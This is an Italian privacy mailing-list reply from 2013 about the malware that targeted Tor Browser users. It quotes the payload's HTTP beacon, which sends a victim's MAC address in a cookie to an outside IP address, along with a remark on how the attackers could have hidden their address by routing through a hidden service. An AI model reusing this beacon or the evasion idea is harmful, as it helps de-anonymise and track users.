[e-privacy] Riguardo TorBrowser & Malware

Leandro Noferini lnoferin a cybervalley.org
Sab 10 Ago 2013 20:08:42 CEST 

"Tramaci.Org" <epto at tramaci.org> writes:


[...]

> Io consiglierei di non usare software americano in generale.

Ho paura che la definizione "americano" applicata al software sia ben
poco significativa.

> Nella versione di torbrowser non dovrebbero copiare il codice di
> firefox, forse dovrebbero usare un'altro browser
> oppure ispezionare bene il codice rimuovendo alcune features non necessarie.

Non è un lavoro da poco "ispezionare" il codice di un mastodonte come
firefox.

> Ma rendiamoci conto di una cosa. Perchè usare un browser così lento
> che riesce ad occupare gran parte delle risorse del sistema per vedere
> pagine web. É come andare a caccia di mosche con il cannone!

Perché firefox è l'unico browser che viene considerato "user-friendly" a
sufficienza da essere distribuito.

> Firefox e mozilla dovrebbero uscire da certi progetti.

Il problema è trovare sostituti.

> Comunque, per la cronaca ècco il codice sorgente del paylod per il
> malware su torbrowser.
> Sono stati stupidi perchè potevano aggiungere qualche byte per non far
> scoprire il loro ip.
> Bastava usare la porta di tor su 127.0.0.1 e spedire la richiesta come
> socks4a ad un hidden service.
> Quindi non son tanto bravi a non farsi scoprire questi del fbi.
> Domandiamoci perchè volevano farsi vedere così tanto.

Perché sono intoccabili?

> Comunque ricordatevi di mandare a 65.222.202.54 come richiesta http un
> cookie con il mac address della vostra scheda di rete.
> GET /1f84ae1d-0b15-44dc-9963-8bc971104590 HTTP/1.1
> Host: hidden service
> Cookie: ID= mac address in esadecimale
> Connection: keep-alive
> Accept: */*\r\n"
> Accept-Encoding: gzip

Fatto! E ora?

-- 
leandro
Paul Simonon chiese a Mick Jones perché non avesse partecipato ad una
rissa durante un concerto. "Qualcuno doveva rimanere intonato" fu la
risposta.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 481 bytes
Desc: not available
URL: <http://lists.winstonsmith.org/pipermail/e-privacy/attachments/20130810/027695d1/attachment.pgp>

Maggiori informazioni sulla lista e-privacy